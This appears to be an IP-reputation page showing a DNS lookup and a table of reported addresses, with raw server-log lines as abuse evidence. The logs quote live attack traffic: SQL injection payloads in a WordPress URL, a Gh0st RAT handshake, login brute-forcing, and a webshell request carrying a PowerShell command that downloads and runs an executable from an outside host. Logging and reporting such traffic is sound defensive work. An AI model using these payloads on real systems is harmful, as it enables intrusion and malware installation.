City: unknown
Region: unknown
Country: unknown
Internet Service Provider: unknown
Hostname: unknown
Organization: unknown
Usage Type: unknown
bb'
; <<>> DiG 9.11.3-1ubuntu1.15-Ubuntu <<>> 2600:1400:d:5a4::279f
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 63455
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 65494
;; QUESTION SECTION:
;2600:1400:d:5a4::279f. IN A
;; Query time: 0 msec
;; SERVER: 127.0.0.53#53(127.0.0.53)
;; WHEN: Sat Feb 19 03:00:14 CST 2022
;; MSG SIZE rcvd: 50
'f.9.7.2.0.0.0.0.0.0.0.0.0.0.0.0.4.a.5.0.d.0.0.0.0.0.4.1.0.0.6.2.ip6.arpa domain name pointer g2600-1400-000d-05a4-0000-0000-0000-279f.deploy.static.akamaitechnologies.com.Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
f.9.7.2.0.0.0.0.0.0.0.0.0.0.0.0.4.a.5.0.d.0.0.0.0.0.4.1.0.0.6.2.ip6.arpa name = g2600-1400-000d-05a4-0000-0000-0000-279f.deploy.static.akamaitechnologies.com.
Authoritative answers can be found from:| IP | Type | Details | Datetime |
|---|---|---|---|
| 185.93.3.129 | bots | 185.93.3.129 - - [13/Apr/2019:09:07:49 +0800] "GET /robots.txt HTTP/1.1" 200 292 "-" "Mozilla/5.0 (compatible; Cliqzbot/2.0; +http://cliqz.com/company/cliqzbot)" 185.93.3.129 - - [13/Apr/2019:09:07:51 +0800] "GET /check-ip/118.25.71.65 HTTP/1.1" 200 8968 "-" "Mozilla/5.0 (compatible; Cliqzbot/2.0; +http://cliqz.com/company/cliqzbot)" |
2019-04-13 09:17:16 |
| 213.97.80.165 | bots | 213.97.80.165 - - [21/Apr/2019:08:08:52 +0800] "GET //CHANGELOG.txt HTTP/1.1" 301 194 "-" "libwww-perl/6.04" 213.97.80.165 - - [21/Apr/2019:08:08:54 +0800] "GET //CHANGELOG.txt HTTP/1.1" 308 257 "-" "libwww-perl/6.04" 213.97.80.165 - - [21/Apr/2019:08:09:00 +0800] "GET /check-ip//CHANGELOG.txt HTTP/1.1" 301 194 "-" "libwww-perl/6.04" 213.97.80.165 - - [21/Apr/2019:08:09:01 +0800] "GET /check-ip//CHANGELOG.txt HTTP/1.1" 404 232 "-" "libwww-perl/6.04" |
2019-04-21 08:10:22 |
| 123.206.22.203 | attack | 123.206.22.203 - - [19/Apr/2019:13:57:02 +0800] "GET /d7.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" 123.206.22.203 - - [19/Apr/2019:13:57:02 +0800] "GET /rxr.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" 123.206.22.203 - - [19/Apr/2019:13:57:02 +0800] "GET /1x.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" 123.206.22.203 - - [19/Apr/2019:13:57:02 +0800] "GET /home.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" 123.206.22.203 - - [19/Apr/2019:13:57:02 +0800] "GET /undx.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" 123.206.22.203 - - [19/Apr/2019:13:57:02 +0800] "GET /spider.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" |
2019-04-19 14:00:22 |
| 46.248.167.73 | bots | 46.248.167.73 - - [13/Apr/2019:10:17:45 +0800] "GET /index.php/category/root/amazon/ HTTP/1.1" 200 21893 "-" "Zend_Http_Client" |
2019-04-13 10:18:13 |
| 176.121.14.179 | attack | 176.121.14.179 - - [12/Apr/2019:18:51:46 +0800] "GET /wp-includes/js/jquery/jquery.js?ver=%28SELECT%20%28CASE%20WHEN%20%286045%3D3065%29%20THEN%206045%20ELSE%206045%2A%28SELECT%206045%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 HTTP/1.1" 200 37676 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" 176.121.14.179 - - [12/Apr/2019:18:51:46 +0800] "GET /wp-includes/js/jquery/jquery.js?ver=%28SELECT%20%28CASE%20WHEN%20%281221%3D1221%29%20THEN%201221%20ELSE%201221%2A%28SELECT%201221%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 HTTP/1.1" 200 37676 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" 176.121.14.179 - - [12/Apr/2019:18:51:46 +0800] "GET /wp-includes/js/jquery/jquery.js?ver=1.12.4%29%20AND%20%28SELECT%204391%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x716a717871%2C%28SELECT%20%28ELT%284391%3D4391%2C1%29%29%29%2C0x7178717671%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287476%3D7476 HTTP/1.1" 200 37676 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" 176.121.14.179 - - [12/Apr/2019:18:51:46 +0800] "GET /wp-includes/js/jquery/jquery.js?ver=1.12.4%20AND%20%28SELECT%204391%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x716a717871%2C%28SELECT%20%28ELT%284391%3D4391%2C1%29%29%29%2C0x7178717671%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 HTTP/1.1" 200 37676 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" |
2019-04-12 18:57:10 |
| 193.176.86.170 | attack | 193.176.86.170 - - [16/Apr/2019:16:41:02 +0800] "\\x03\\x00\\x00*%\\xE0\\x00\\x00\\x00\\x00\\x00Cookie: mstshash=Test" 400 182 "-" "-" 193.176.86.170 - - [16/Apr/2019:16:41:03 +0800] "\\x03\\x00\\x00*%\\xE0\\x00\\x00\\x00\\x00\\x00Cookie: mstshash=Test" 400 182 "-" "-" |
2019-04-16 16:41:49 |
| 113.4.133.2 | attack | 攻击 端口扫描 |
2019-04-15 14:29:58 |
| 113.89.2.220 | bots | 113.89.2.220 - - [19/Apr/2019:08:27:24 +0800] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 113.89.2.220 - - [19/Apr/2019:08:27:24 +0800] "GET / HTTP/1.1" 200 10278 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 113.89.2.220 - - [19/Apr/2019:08:27:26 +0800] "HEAD /aboutus HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 113.89.2.220 - - [19/Apr/2019:08:27:26 +0800] "GET /aboutus HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 113.89.2.220 - - [19/Apr/2019:08:27:27 +0800] "HEAD / HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 113.89.2.220 - - [19/Apr/2019:08:27:27 +0800] "GET / HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 113.89.2.220 - - [19/Apr/2019:08:27:28 +0800] "HEAD /check-ip/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 113.89.2.220 - - [19/Apr/2019:08:27:28 +0800] "GET /check-ip/ HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 113.89.2.220 - - [19/Apr/2019:08:27:29 +0800] "HEAD /report-ip HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 113.89.2.220 - - [19/Apr/2019:08:27:29 +0800] "GET /report-ip HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 113.89.2.220 - - [19/Apr/2019:08:27:30 +0800] "HEAD /faq HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 113.89.2.220 - - [19/Apr/2019:08:27:30 +0800] "GET /faq HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" |
2019-04-19 08:28:01 |
| 61.110.125.144 | attack | wordpress攻击 本身不是wordpress程序还搞了个wp-login 61.110.125.144 - - [18/Apr/2019:10:10:52 +0800] "GET /check-ip/5.9.61.232 HTTP/1.1" 200 8330 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" 61.110.125.144 - - [18/Apr/2019:10:10:52 +0800] "GET /wp-login.php?action=register HTTP/1.1" 404 209 "https://ipinfo.asytech.cn/" "Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17" 61.110.125.144 - - [18/Apr/2019:10:10:53 +0800] "GET /wp-login.php?action=register HTTP/1.1" 404 209 "https://ipinfo.asytech.cn/wp-login.php?action=register" "Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17" |
2019-04-18 10:11:48 |
| 185.255.46.177 | botsattack | 185.255.46.177 - - [21/Apr/2019:07:47:25 +0800] "GET //blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" 185.255.46.177 - - [21/Apr/2019:07:47:25 +0800] "GET //wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" 185.255.46.177 - - [21/Apr/2019:07:47:26 +0800] "GET //wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" |
2019-04-21 07:54:08 |
| 37.49.224.79 | bots | 37.49.224.79 - - [22/Apr/2019:11:48:41 +0800] "GET /check-ip/61.160.195.187 HTTP/1.1" 200 55632 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" 37.49.224.79 - - [22/Apr/2019:11:48:41 +0800] "GET /check-ip/203.208.60.97 HTTP/1.1" 200 59805 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" 37.49.224.79 - - [22/Apr/2019:11:48:42 +0800] "GET /check-ip/113.4.133.2 HTTP/1.1" 200 52944 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" 37.49.224.79 - - [22/Apr/2019:11:48:43 +0800] "GET /check-ip/113.237.176.72 HTTP/1.1" 200 54495 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" 37.49.224.79 - - [22/Apr/2019:11:48:44 +0800] "GET /check-ip/142.93.214.167 HTTP/1.1" 200 53059 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" |
2019-04-22 11:49:17 |
| 118.25.71.65 | attack | 118.25.71.65 - - [19/Apr/2019:15:56:16 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start%20C:/Windows/temp/rdoromzcvnzisoj23580.exe HTTP/1.1" 301 194 "http://118.25.52.138:80/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start C:/Windows/temp/rdoromzcvnzisoj23580.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.71.65 - - [19/Apr/2019:15:56:16 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start%20C:/Windows/temp/rdoromzcvnzisoj23580.exe HTTP/1.1" 404 232 "http://118.25.52.138:80/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start C:/Windows/temp/rdoromzcvnzisoj23580.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-04-19 15:56:51 |
| 66.240.205.34 | attack | 66.240.205.34 - - [15/Apr/2019:16:54:43 +0800] "Gh0st\\xAD\\x00\\x00\\x00\\xE0\\x00\\x00\\x00x\\x9CKS``\\x98\\xC3\\xC0\\xC0\\xC0\\x06\\xC4\\x8C@\\xBCQ\\x96\\x81\\x81\\x09H\\x07\\xA7\\x16\\x95e&\\xA7*\\x04$&g+\\x182\\x94\\xF6\\xB000\\xAC\\xA8rc\\x00\\x01\\x11\\xA0\\x82\\x1F\\x5C`&\\x83\\xC7K7\\x86\\x19\\xE5n\\x0C9\\x95n\\x0C;\\x84\\x0F3\\xAC\\xE8sch\\xA8^\\xCF4'J\\x97\\xA9\\x82\\xE30\\xC3\\x91h]&\\x90\\xF8\\xCE\\x97S\\xCBA4L?2=\\xE1\\xC4\\x92\\x86\\x0B@\\xF5`\\x0CT\\x1F\\xAE\\xAF]" 400 182 "-" "-" |
2019-04-15 16:55:20 |
| 101.226.114.193 | attack | 101.226.114.193 - - [22/Apr/2019:08:26:29 +0800] "GET /web/cgi-bin/hi3510/param.cgi?cmd%253Dgetp2pattr%2526cmd%253Dgetuserattr HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 101.226.114.193 - - [22/Apr/2019:08:26:29 +0800] "GET /web/cgi-bin/hi3510/param.cgi?cmd%253Dgetp2pattr%2526cmd%253Dgetuserattr HTTP/1.1" 404 209 "http://118.25.52.138/web/cgi-bin/hi3510/param.cgi?cmd%253Dgetp2pattr%2526cmd%253Dgetuserattr" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-22 08:28:33 |
| 61.160.221.73 | attack | 61.160.221.73 - - [21/Apr/2019:04:15:36 +0800] "POST /wp-login.php HTTP/1.1" 302 284 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 S afari/537.36 SE 2.X MetaSr 1.0" 61.160.221.73 - - [21/Apr/2019:04:15:43 +0800] "GET /wp-login.php HTTP/1.1" 200 5456 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 S afari/537.36 SE 2.X MetaSr 1.0" 61.160.221.73 - - [21/Apr/2019:04:15:47 +0800] "POST /wp-login.php HTTP/1.1" 302 284 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 S afari/537.36 SE 2.X MetaSr 1.0" |
2019-04-21 06:59:39 |